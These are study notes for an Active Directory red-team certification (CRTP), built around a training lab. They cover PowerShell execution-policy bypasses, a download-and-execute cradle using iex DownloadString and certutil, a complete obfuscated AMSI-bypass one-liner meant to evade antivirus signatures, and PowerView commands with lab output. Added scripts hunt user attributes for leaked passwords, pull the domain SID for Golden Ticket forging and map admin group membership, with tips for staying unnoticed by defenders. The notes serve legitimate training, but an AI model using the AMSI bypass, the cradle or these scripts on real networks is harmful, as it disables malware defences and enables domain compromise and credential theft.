CRTP Notes Meshari Almalki


CRTP-Notes-Meshari-Almalki

💡 Meshari-Almalki Enjoy ❤ Twitter: @slv0d Linkedin:@meshari-almalki

Active Directory:
Active Directory (AD) is Microsoft's proprietary directory service. It runs on Windows Server
and enables administrators to manage permissions and access to network resources.

Active Directory stores data as objects. An object is a single element, such as a user,
group, application or device such as a printer. Objects are normally defined as either
resources, such as printers or computers, or security principals, such as users or groups.

PowerShell Cmdlets:
Get-Command -CommandType cmdlet → list all available cmdlets

Get-Process → list all processes on the machine

Execution Policy:
The execution policy is not a security boundary; it only decides whether scripts run by default, and it is trivially bypassed:

powershell -ExecutionPolicy bypass

powershell -ep bypass

powershell -c <cmd>

powershell -EncodedCommand <Base64_of_UTF-16LE_command>

$env:PSExecutionPolicyPreference="bypass"

PowerShell Module:

Import a module:

Import-Module <modulePath>

List all commands of a module:

Get-Command -Module <moduleName>

Download and execute cradle:

iex (New-Object Net.WebClient).DownloadString('https://<URL>')

certutil.exe -urlcache -f "<URL>" <File_name>

AMSI bypass (obfuscated one-liner). It uses reflection to set the non-public static field System.Management.Automation.AmsiUtils.amsiInitFailed to $true, after which AMSI stops scanning content in the current PowerShell process. Run it before loading PowerView or any other script that is signatured; the string concatenation and backticks only exist to evade static signatures on the bypass itself:

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Transfer File:

# PSCP command (copy a file from the target to the local machine)
pscp <username>@<ip_of_target_machine>:/<path_to_file> <destination>

Domain Enumeration
Domain enumeration can be done directly with the .NET classes or with scripts such as PowerView.ps1.

Before anything else, AMSI ( Antimalware Scan Interface ) has to be bypassed, otherwise loading PowerView is blocked.

📌 Check this GitHub Gist for other PowerShell bypasses: reigningshells/powershell-bypasses.ps1

1. .NET class to view the domain name and related information:

[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

Forest → name of the forest ( moneycorp.local )

Parent → the parent domain ( moneycorp.local ); empty when the current domain is the forest root

DomainControllers → there is just one here { dcorp-dc }

DomainModeLevel → domain functional level ( Windows Server 2016 )

Name → the current domain, dollarcorp.moneycorp.local ( a child domain; this forest has just one level below the root )
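As an added example (not from the original notes): the same information pulled with the .NET classes only, plus the domain SID, wrapped in functions so it can be reused without loading PowerView or the AD module (handy when AMSI or AppLocker get in the way of scripts). It assumes the session runs as a domain user on a domain-joined host; the function names are my own.

```powershell
# Added example: domain/forest overview with System.DirectoryServices.ActiveDirectory only.
# Assumes a domain-joined host and a domain user context (no PowerView, no RSAT).

function Get-DomainOverview {
    $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
    $forest = $domain.Forest

    [PSCustomObject]@{
        Domain            = $domain.Name
        # Parent is $null when the current domain is the forest root
        ParentDomain      = if ($domain.Parent) { $domain.Parent.Name } else { '<forest root>' }
        Forest            = $forest.Name
        ForestRootDomain  = $forest.RootDomain.Name
        DomainMode        = $domain.DomainMode
        ForestMode        = $forest.ForestMode
        # The PDC emulator is the DC that sees every password change and lockout
        PdcEmulator       = $domain.PdcRoleOwner.Name
        DomainControllers = ($domain.DomainControllers | ForEach-Object { $_.Name }) -join ', '
        ChildDomains      = ($domain.Children | ForEach-Object { $_.Name }) -join ', '
        AllForestDomains  = ($forest.Domains | ForEach-Object { $_.Name }) -join ', '
    }
}

# Domain SID without PowerView: read objectSid from the domain's directory entry.
# The SID is what Golden Ticket forging needs, together with the krbtgt hash.
function Get-DomainSidFromDotNet {
    $domain   = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
    $entry    = $domain.GetDirectoryEntry()
    $sidBytes = $entry.Properties['objectSid'].Value          # raw binary SID
    (New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)).Value
}

Get-DomainOverview | Format-List
Get-DomainSidFromDotNet
```

Everything here is a plain LDAP read that any authenticated domain user can perform; nothing in it requires PowerView to be on disk or in memory.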

2. PowerView.ps1

a. Get-NetDomain → information about the current domain.

b. Get-NetDomain -Domain <Domain_Name> → domain object of another domain.

c. Get-DomainSID → print the domain SID.

d. Get-DomainPolicy → print the domain policy of the current domain.

(Get-DomainPolicy)."<Policy_Section>"
(Get-DomainPolicy).'system access'

This shows the values of one policy section, for example the Kerberos policy (ticket lifetimes), which matters when forging tickets such as a Golden Ticket that should look legitimate.

e. Get-NetDomainController → domain controllers of the current domain.

Get-NetDomainController -Domain <Name_Of_Domain>

3. ADModule:

a. Import-Module <path>\Microsoft.ActiveDirectory.Management.dll ( the DLL works without installing RSAT; import the module's ActiveDirectory.psd1 afterwards for the full cmdlet set )

Commands of ADModule:

Get-ADDomain → like Get-NetDomain in PowerView.ps1

Get-ADDomain -Identity <Domain_Name> → domain object of another domain

Get-ADDomainController

Users Enumeration
1. PowerView

Get-NetUser → list all users.

Get-NetUser -User <UserName> → full information about a specific user.

Get-UserProperty → list the property names available on user objects.

Get-UserProperty -Properties <NameOfProperty> → that property for every user ( e.g. pwdlastset, logoncount, badpwdcount ).

Important:
Search for a particular string in a user's attributes. Why? Passwords are sometimes left behind in the Description field 😉

Find-UserField -SearchField Description -SearchTerm "<term>"

2. ADModule

Get-ADUser -Filter * -Properties *

Get-ADUser -Identity <UserName> -Properties *

Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name

Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select Name, Description
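Added example (not from the original notes, and not a PowerView or AD module function): the same description search done with a raw LDAP query through System.DirectoryServices.DirectorySearcher, extended to the other free-text attributes where "temporary" passwords usually end up and to a keyword regex instead of a single term. The attribute list, the regex and the function name are my assumptions.

```powershell
# Added example: hunt for credential hints in user attributes with a raw LDAP query.
# Works as any domain user; attribute list and regex are assumptions to tune per target.

function Find-LeakedCredentialHints {
    param(
        # Free-text attributes that commonly hold passwords or hints (assumed list)
        [string[]]$Attributes = @('description', 'info', 'comment'),
        # Assumed keyword pattern; extend for the target's language and conventions
        [string]$Pattern = '(?i)(pass|pwd|cred|secret|token|key)'
    )

    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    # Only user objects that have at least one of the attributes populated
    $attrFilter = ($Attributes | ForEach-Object { "($_=*)" }) -join ''
    $searcher.Filter   = "(&(objectCategory=person)(objectClass=user)(|$attrFilter))"
    $searcher.PageSize = 1000      # paged results, so domains with >1000 users are not truncated
    $searcher.PropertiesToLoad.AddRange([string[]](@('samaccountname', 'distinguishedname') + $Attributes))

    foreach ($result in $searcher.FindAll()) {
        foreach ($attr in $Attributes) {
            $value = $result.Properties[$attr]
            if ($value.Count -gt 0 -and ($value[0] -match $Pattern)) {
                [PSCustomObject]@{
                    SamAccountName = $result.Properties['samaccountname'][0]
                    Attribute      = $attr
                    Value          = $value[0]
                    DN             = $result.Properties['distinguishedname'][0]
                }
            }
        }
    }
}

Find-LeakedCredentialHints | Format-Table -AutoSize
```

Use a server-side filter like this rather than pulling every user with all properties and filtering client-side: it is faster on large domains and produces far less LDAP traffic for a defender to notice.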

Computer Enumeration
1. PowerView

Get-NetComputer → computer objects in the domain ( an object does not mean the machine is online, or even still exists )

Get-NetComputer -Ping → check which machines are live

Get-NetComputer -FullData

Get-NetComputer -OperatingSystem "*Server 2016*"

2. ADModule

Get-ADComputer -Filter * | select Name

Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name, OperatingSystem

Group Enumeration
1. PowerView

Get-NetGroup → list all the domain groups

Get-NetGroup -FullData

Get-NetGroup "Domain Admins" -FullData → the Domain Admins group only ( gives detailed information, including which users hold Domain Admin rights )

Get-NetGroup -GroupName "*admin*" → all groups whose name contains "admin"

Get-NetGroup -GroupName "*admin*" -Domain <Forest_Root> → also returns forest-level groups such as Enterprise Admins; these exist only in the forest root domain ( moneycorp.local )

2. ADModule

Get-ADGroup -Filter * | select Name

Group Member Enumeration

1. PowerView

Get-NetGroupMember -GroupName "Domain Admins"

GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
MemberDomain : dollarcorp.moneycorp.local
MemberName : svcadmin
MemberSID : S-1-5-21-1874506631-3219952063-538504511-1122
IsGroup : False -> a user, not a nested group
MemberDN : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
MemberDomain : dollarcorp.moneycorp.local
MemberName : Administrator -> built-in default domain Administrator
MemberSID : S-1-5-21-1874506631-3219952063-538504511-500 -> RID 500 = built-in Administrator
IsGroup : False -> a user, not a nested group
MemberDN : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

The point of RID 500: the built-in Administrator account can be renamed, so it is identified by the RID 500 at the end of its SID rather than by its name 👍

Get-NetGroupMember -GroupName "Enterprise Admins"

// No output. Why? Enterprise Admins exists only in the forest root domain, moneycorp.local, so it has to be queried there:
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain "moneycorp.local"

GroupDomain : moneycorp.local
GroupName : Enterprise Admins
MemberDomain : moneycorp.local -> as said, belongs to the forest root domain
MemberName : Administrator
MemberSID : S-1-5-21-280534878-1496970234-700767426-500
IsGroup : False
MemberDN : CN=Administrator,CN=Users,DC=moneycorp,DC=local

Get-NetGroupMember -GroupName "Administrators" -Recurse

When a group contains other groups, -Recurse expands each nested group down to its own members. Without -Recurse, Administrators shows only its direct members:

GroupDomain : dollarcorp.moneycorp.local
GroupName : Administrators
MemberDomain : moneycorp.local
MemberName : Enterprise Admins
MemberSID : S-1-5-21-280534878-1496970234-700767426-519
IsGroup : True -> a nested group, not a user
MemberDN : CN=Enterprise Admins,CN=Users,DC=moneycorp,DC=local

GroupDomain : dollarcorp.moneycorp.local
GroupName : Administrators
MemberDomain : dollarcorp.moneycorp.local
MemberName : Domain Admins
MemberSID : S-1-5-21-1874506631-3219952063-538504511-512
IsGroup : True
MemberDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

GroupDomain : dollarcorp.moneycorp.local
GroupName : Administrators
MemberDomain : dollarcorp.moneycorp.local
MemberName : Administrator
MemberSID : S-1-5-21-1874506631-3219952063-538504511-500
IsGroup : False -> a direct user member of Administrators
MemberDN : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

After using -Recurse:

GroupDomain : dollarcorp.moneycorp.local
GroupName : Administrators
MemberDomain : moneycorp.local
MemberName : Enterprise Admins
MemberSID : S-1-5-21-280534878-1496970234-700767426-519
IsGroup : True
MemberDN : CN=Enterprise Admins,CN=Users,DC=moneycorp,DC=local

GroupDomain : moneycorp.local
GroupName : Enterprise Admins
MemberDomain : moneycorp.local
MemberName : Administrator -> member of Enterprise Admins
MemberSID : S-1-5-21-280534878-1496970234-700767426-500
IsGroup : False
MemberDN : CN=Administrator,CN=Users,DC=moneycorp,DC=local

GroupDomain : dollarcorp.moneycorp.local
GroupName : Administrators
MemberDomain : dollarcorp.moneycorp.local
MemberName : Domain Admins
MemberSID : S-1-5-21-1874506631-3219952063-538504511-512
IsGroup : True
MemberDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
MemberDomain : dollarcorp.moneycorp.local
MemberName : svcadmin -> member of Domain Admins
MemberSID : S-1-5-21-1874506631-3219952063-538504511-1122
IsGroup : False
MemberDN : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
MemberDomain : dollarcorp.moneycorp.local
MemberName : Administrator
MemberSID : S-1-5-21-1874506631-3219952063-538504511-500
IsGroup : False
MemberDN : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

GroupDomain : dollarcorp.moneycorp.local
GroupName : Administrators
MemberDomain : dollarcorp.moneycorp.local
MemberName : Administrator
MemberSID : S-1-5-21-1874506631-3219952063-538504511-500
IsGroup : False
MemberDN : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
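Added example (not from the original notes): how -Recurse works, implemented by hand over the LDAP member attribute with [ADSI]. It covers the case shown above where a group from the forest root (Enterprise Admins) is nested into the child domain's Administrators: such members appear as foreignSecurityPrincipal objects whose DN only carries the SID, so they are resolved via the SID. The function name is mine; a visited set guards against circular nesting.

```powershell
# Added example: recursive group expansion over the 'member' attribute via [ADSI].
# Assumes a domain user context on a domain-joined host.

function Get-GroupMembersRecursive {
    param(
        [Parameter(Mandatory)] [string]$GroupDN,
        [System.Collections.Generic.HashSet[string]]$Visited = (New-Object 'System.Collections.Generic.HashSet[string]'),
        [int]$Depth = 0
    )
    # Already expanded (circular or repeated nesting): stop here
    if (-not $Visited.Add($GroupDN)) { return }

    $group = [ADSI]"LDAP://$GroupDN"
    foreach ($memberDN in $group.Properties['member']) {
        $member = [ADSI]"LDAP://$memberDN"
        # Last objectClass value is the most specific: user, group, computer, foreignSecurityPrincipal
        $class = @($member.Properties['objectClass'].Value)[-1]
        $sid   = (New-Object System.Security.Principal.SecurityIdentifier($member.Properties['objectSid'].Value, 0)).Value

        if ($class -eq 'foreignSecurityPrincipal') {
            # Principal from another domain (e.g. mcorp\Enterprise Admins); translate the SID if a trust allows it
            $name    = try { (New-Object System.Security.Principal.SecurityIdentifier($sid)).Translate([System.Security.Principal.NTAccount]).Value } catch { $sid }
            $isGroup = $false    # the FSP object does not say; cross-domain groups are not expanded here
        } else {
            $name    = $member.Properties['sAMAccountName'].Value
            $isGroup = ($class -eq 'group')
        }

        [PSCustomObject]@{
            Depth    = $Depth
            Group    = $GroupDN
            Member   = $name
            Class    = $class
            IsGroup  = $isGroup
            SID      = $sid
            MemberDN = $memberDN
        }
        if ($isGroup) {
            Get-GroupMembersRecursive -GroupDN $memberDN -Visited $Visited -Depth ($Depth + 1)
        }
    }
}

# Expand Domain Admins, then the built-in Administrators group of the current domain
$domainDN = ([ADSI]'LDAP://RootDSE').Properties['defaultNamingContext'].Value
Get-GroupMembersRecursive -GroupDN "CN=Domain Admins,CN=Users,$domainDN" | Format-Table -AutoSize
Get-GroupMembersRecursive -GroupDN "CN=Administrators,CN=Builtin,$domainDN" | Format-Table -AutoSize
```

Two caveats a practitioner should know: the member attribute does not list users whose primary group is the group in question (which is why Domain Users looks empty), and groups with more than 1500 members return member in ranges that this example does not page through.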

To find which groups a user belongs to:
Get-NetGroup -UserName <UserName>

Get-NetGroup -UserName "Administrator"

dcorp\Denied RODC Password Replication Group
dcorp\Domain Admins
dcorp\Domain Users
dcorp\Group Policy Creator Owners

# These are the groups the Administrator user belongs to in the current domain

Get-NetGroup -UserName "Administrator" -Domain "moneycorp.local"

mcorp\Denied RODC Password Replication Group
S-1-5-21-280534878-1496970234-700767426-519
mcorp\Schema Admins
mcorp\Group Policy Creator Owners
mcorp\Domain Users
mcorp\Domain Admins

# Here the forest root domain was specified and more groups come back, among them the Enterprise Admins group ( RID 519, shown unresolved as its SID )

To find which groups I am in:

PS C:\AD\Tools> whoami
dcorp\student181
PS C:\AD\Tools> Get-NetGroup -UserName "student182"
dcorp\RDPUsers
dcorp\Domain Users
PS C:\AD\Tools> Get-NetGroup -UserName "student182" -FullData

grouptype : -2147483646
displayname : RDP Users
samaccounttype : 268435456
samaccountname : RDPUsers
whenchanged : 10/7/2021 12:53:14 PM
objectsid : S-1-5-21-1874506631-3219952063-538504511-1116 -> RID above 1000: a custom group, not built in
objectclass : {top, group}
cn : RDP Users
usnchanged : 2769985
dscorepropagationdata : {5/3/2020 9:04:05 AM, 2/21/2019 12:17:00 PM, 2/19/2019 1:0
name : RDP Users
adspath : LDAP://dcorp-dc.dollarcorp.moneycorp.local/CN=RDP Users,CN
description : RDP Users Group
distinguishedname : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
member : {CN=student190,CN=Users,DC=dollarcorp,DC=moneycorp,DC=loca
CN=student188,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
usncreated : 14632
whencreated : 2/17/2019 1:27:15 PM
instancetype : 4
objectguid : 46ead3d4-f93c-4c0f-8f43-81c5e802e0a4
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

usncreated : 12318
grouptype : -2147483646
samaccounttype : 268435456
samaccountname : Domain Users
whenchanged : 2/17/2019 7:01:46 AM
objectsid : S-1-5-21-1874506631-3219952063-538504511-513 -> RID 513: well-known built-in group ( Domain Users )
objectclass : {top, group}
cn : Domain Users
usnchanged : 12320
dscorepropagationdata : {5/3/2020 9:04:05 AM, 2/21/2019 12:17:00 PM, 2/19/2019 1:
memberof : CN=Users,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local
adspath : LDAP://dcorp-dc.dollarcorp.moneycorp.local/CN=Domain User
iscriticalsystemobject : True
description : All domain users
distinguishedname : CN=Domain Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=lo
name : Domain Users
whencreated : 2/17/2019 7:01:46 AM
instancetype : 4

objectguid : 1d9a6145-d382-4711-92a1-35939195e601
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

List all local groups on a domain controller:

Get-NetLocalGroup -ComputerName <DC> -ListGroups

Server                               Group                               SID           Description
------                               -----                               ---           -----------
dcorp-dc.dollarcorp.moneycorp.local  Server Operators                    S-1-5-32-549  Members can administer domain servers
dcorp-dc.dollarcorp.moneycorp.local  Account Operators                   S-1-5-32-548  Members can administer domain user and group accounts
dcorp-dc.dollarcorp.moneycorp.local  Pre-Windows 2000 Compatible Access  S-1-5-32-554  A backward compatibility group which allows read access on all users and groups in...
dcorp-dc.dollarcorp.moneycorp.local  Windows Authorization Access Group  S-1-5-32-560  Members of this group have access to the computed tokenGroupsGlobalAndUniversal at...
dcorp-dc.dollarcorp.moneycorp.local  Terminal Server License Servers     S-1-5-32-561  Members of this group can update user accounts in Active Directory with informatio...
dcorp-dc.dollarcorp.moneycorp.local  Administrators                      S-1-5-32-544  Administrators have complete and unrestricted access to the computer/domain
dcorp-dc.dollarcorp.moneycorp.local  Users                               S-1-5-32-545  Users are prevented from making accidental or intentional system-wide changes and ...

List members of the local Administrators group on the DC ( the default group when none is given ):

Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local

ComputerName : dcorp-dc.dollarcorp.moneycorp.local
AccountName : dollarcorp.moneycorp.local/Administrator
IsDomain : True
IsGroup : False
SID : S-1-5-21-1874506631-3219952063-538504511-500 -> Administrator user
Description :
Disabled :
LastLogin : 4/6/2022 6:27:00 AM
PwdLastSet :
PwdExpired :
UserFlags :

ComputerName : dcorp-dc.dollarcorp.moneycorp.local
AccountName : dollarcorp.moneycorp.local/Domain Admins
IsDomain : True
IsGroup : True
SID : S-1-5-21-1874506631-3219952063-538504511-512
Description :
Disabled :
LastLogin :
PwdLastSet :
PwdExpired :
UserFlags :
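Added example (not from the original notes): the WinNT ADSI provider call that sits underneath Get-NetLocalGroup, so local group membership on a remote host can be listed without PowerView. The computer name is the lab DC from the output above; the function name is my own.

```powershell
# Added example: local group membership over the WinNT provider (SAM-R), as any domain user.
# Assumes the target allows SAM remote access for the caller (default on DCs and older clients).

function Get-LocalGroupMembership {
    param(
        [Parameter(Mandatory)] [string]$ComputerName,
        [string]$GroupName = 'Administrators'
    )
    $group = [ADSI]"WinNT://$ComputerName/$GroupName,group"
    # IADsGroup::Members() returns COM objects; read their properties through InvokeMember
    foreach ($member in @($group.psbase.Invoke('Members'))) {
        $path     = $member.GetType().InvokeMember('ADsPath',   'GetProperty', $null, $member, $null)
        $class    = $member.GetType().InvokeMember('Class',     'GetProperty', $null, $member, $null)
        $sidBytes = $member.GetType().InvokeMember('objectSID', 'GetProperty', $null, $member, $null)
        $sid      = (New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)).Value
        # ADsPath looks like WinNT://DOMAIN/name (domain principal) or WinNT://COMPUTER/name (local)
        $parts = ($path -replace '^WinNT://', '') -split '/'
        [PSCustomObject]@{
            ComputerName = $ComputerName
            Group        = $GroupName
            Member       = "$($parts[0])\$($parts[-1])"
            IsGroup      = ($class -eq 'Group')
            IsDomain     = ($parts[0] -ne $ComputerName.Split('.')[0])
            SID          = $sid
        }
    }
}

Get-LocalGroupMembership -ComputerName 'dcorp-dc.dollarcorp.moneycorp.local' | Format-Table -AutoSize
Get-LocalGroupMembership -ComputerName 'dcorp-dc.dollarcorp.moneycorp.local' -GroupName 'Remote Desktop Users' | Format-Table -AutoSize
```

On a DC the "local" groups are the domain's BUILTIN groups, which is why Domain Admins shows up as a member; on workstations patched for SAM-R hardening the call may be refused for non-admins, in which case the GPO-based approach (Find-GPOComputerAdmin) is the fallback.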

List actively logged-on users on a computer → needs local admin privileges on the target

I'm not a local admin ☹

List locally logged-on users on a computer → needs the Remote Registry service on the target; it is enabled by default on Server OS

Get-LoggedOnLocal -ComputerName <DC>

Get-LoggedOnLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local

ComputerName UserDomain UserName UserSID
------------ ---------- -------- -------
dcorp-dc.dollarcorp.moneycorp.local dcorp Administrator S-1-5-21-1874506631-3219952063-538504511-500

List the last logged-on user on a computer ( needs administrative rights and Remote Registry on the target ):

Get-LastLoggedOn -ComputerName dcorp-dc.dollarcorp.moneycorp.local

WARNING: [!] Error opening remote registry on dcorp-dc.dollarcorp.moneycorp.local. Remote registry likely not enabled.

Find shares on hosts in the current domain:

Invoke-ShareFinder -Verbose -> lists all shares, including IPC$ and printer shares

Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC -> only the non-default shares

Invoke-FileFinder -Verbose -> find potentially sensitive files on computers in the domain

Get-NetFileServer -Verbose -> list file servers in the domain ( derived from the homeDirectory, scriptPath and profilePath attributes of user objects )

Get-NetFileServer -Verbose
VERBOSE: Get-DomainSearcher search string: LDAP://DC=dollarcorp,DC=moneycorp,DC=local

Group Policy ( GPO )

Group Policy → provides the ability to manage configuration and changes easily and centrally in AD.

Allows configuration of:

1. Security settings

2. Registry-based policy

3. Group Policy preferences, e.g. startup/shutdown/logon/logoff script settings

4. Software installation

Get-NetGPO -> list the GPOs in the domain

usncreated : 8016
systemflags : -1946157056
displayname : Default Domain Policy -> name of the GPO
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4
EA-00C04F79F83A}{803E14A0-
B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB9
4F17}]
whenchanged : 2/17/2019 7:14:30 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 13009
dscorepropagationdata : {5/3/2020 9:04:05 AM, 2/21/2019 12:17:00 PM, 2/19/2019 1:04:02 PM, 2/19/2019 12:55:49 PM...}
name : {31B2F340-016D-11D2-945F-00C04FB984F9} -> GPO GUID ( the object's name and cn )
adspath : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=
local
flags : 0
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\dollarcorp.moneycorp.local\sysvol\dollarcorp.moneycorp.local\Policies\{31B2F340-016D-11D2-945F-00C0
4FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
whencreated : 2/17/2019 7:00:13 AM
versionnumber : 3
instancetype : 4
objectguid : cd0c7024-e03a-4369-958b-9c93fbd25649
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

Get-NetGPO | select displayname -> only the names of the GPOs

displayname
-----------
Default Domain Policy # default GPO
Default Domain Controllers Policy # default GPO
Applocker # custom GPO
Servers # custom GPO
Students # custom GPO

List the GPOs applied to a specific computer ( hostname prints the name of the current machine ):

hostname
-> dcorp-std181

Get-NetGPO -ComputerName dcorp-std181.dollarcorp.moneycorp.local

usncreated : 65831
displayname : Students -> the GPO applied to the student machine
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4
EA-00C04F79F83A}{803E14A0
B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 4/20/2019 6:22:16 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 123144
dscorepropagationdata : {5/3/2020 9:04:05 AM, 2/21/2019 12:17:00 PM, 2/19/2019 1:04:02 PM, 2/19/2019 12:55:49 PM...}
name : {3E04167E-C2B6-4A9A-8FB7-C811158DC97C}
adspath : LDAP://CN={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=
local
flags : 0
cn : {3E04167E-C2B6-4A9A-8FB7-C811158DC97C}
gpcfilesyspath : \\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{3E04167E-C2B6-4A9A-8FB7-C811
158DC97C}
distinguishedname : CN={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
whencreated : 2/19/2019 7:04:25 AM
versionnumber : 8
instancetype : 4
objectguid : 8ecdfe44-b617-4b9e-a9f9-4d548e5dc7b1
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
ComputerName : dcorp-std181.dollarcorp.moneycorp.local

Get-NetGPOGroup -> GPOs that configure Restricted Groups or local group membership ( Group Policy Preferences ) in the domain.

Get users who are in a local group of a machine through GPO:

Find-GPOComputerAdmin -ComputerName <ComputerName> -> very useful in the real world: shows who is local admin on a machine from GPO data alone, without touching the machine

Get machines where the given user is a member of a specific local group:

Find-GPOLocation -UserName <userName> -Verbose

Organizational Units ( OUs )

Everything in AD is an object.

OUs ⇒ containers for these objects.

An OU is a container within an Active Directory domain which can hold users, groups and computers.

It is the smallest unit to which an administrator can assign Group Policy settings or account permissions.

An OU can contain other OUs, but object names within the containing OU must be unique.

OUs cannot contain objects from other domains.

Get-NetOU -FullData -> all information about the OUs in the domain

usncreated : 8147

systemflags : -1946157056
iscriticalsystemobject : True
gplink : [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=loca
whenchanged : 2/17/2019 7:00:13 AM
objectclass : {top, organizationalUnit}
showinadvancedviewonly : False
usnchanged : 8147
dscorepropagationdata : {7/2/2021 1:08:59 PM, 5/3/2020 9:04:05 AM, 5/3/2020 9:04:05 AM, 5/3/2020 9:04:05 AM...}
name : Domain Controllers
adspath : LDAP://OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
description : Default container for domain controllers
distinguishedname : OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
ou : Domain Controllers
whencreated : 2/17/2019 7:00:13 AM
instancetype : 4
objectguid : 051cb518-0bf2-47e4-a3a4-ec36edf5e662
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

Get-NetOU
LDAP://OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
LDAP://OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
LDAP://OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
LDAP://OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local

These are all the OUs in the domain dollarcorp.moneycorp.local.

Get-NetGPO -GPOname "{gplink}" -> the GPO applied to an OU; the GUID comes from the OU's gplink attribute shown above

Get-NetGPO -GPOname "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}" -> the GPO linked to OU=StudentMachines

usncreated : 65831
displayname : Students -> GPO name
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA
B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 4/20/2019 6:22:16 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 123144
dscorepropagationdata : {5/3/2020 9:04:05 AM, 2/21/2019 12:17:00 PM, 2/19/2019 1:04:02 PM, 2/19/2019 12:55:49 PM...}
name : {3E04167E-C2B6-4A9A-8FB7-C811158DC97C}
adspath : LDAP://CN={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=loc
flags : 0
cn : {3E04167E-C2B6-4A9A-8FB7-C811158DC97C}
gpcfilesyspath : \\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{3E04167E-C2B6-4A9A-8FB7-C811158
distinguishedname : CN={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
